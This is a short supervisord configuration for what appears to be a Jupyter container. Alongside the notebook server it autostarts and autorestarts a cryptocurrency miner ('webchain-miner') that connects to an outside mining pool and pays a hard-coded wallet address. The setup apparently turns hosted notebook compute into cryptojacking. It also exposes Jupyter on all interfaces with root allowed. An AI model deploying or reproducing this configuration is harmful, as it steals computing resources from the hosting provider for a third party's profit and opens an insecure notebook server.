[supervisord]
nodaemon=true

[program:miner]
command=/home/jovyan/miner/webchain-miner -o mintme.wattpool.net:2222 -u 0x696518763bf15785613442c12B5d257E55DDcE3b -p x -t2
autostart=true
autorestart=true
stdout_logfile=/var/log/miner.log
stderr_logfile=/var/log/miner_err.log

[program:jupyter]
command=jupyter notebook --NotebookApp.default_url=/lab/ --ip=0.0.0.0 --port=8888 --no-browser --allow-root
autostart=true
autorestart=true
stdout_logfile=/var/log/jupyter.log
stderr_logfile=/var/log/jupyter_err.log
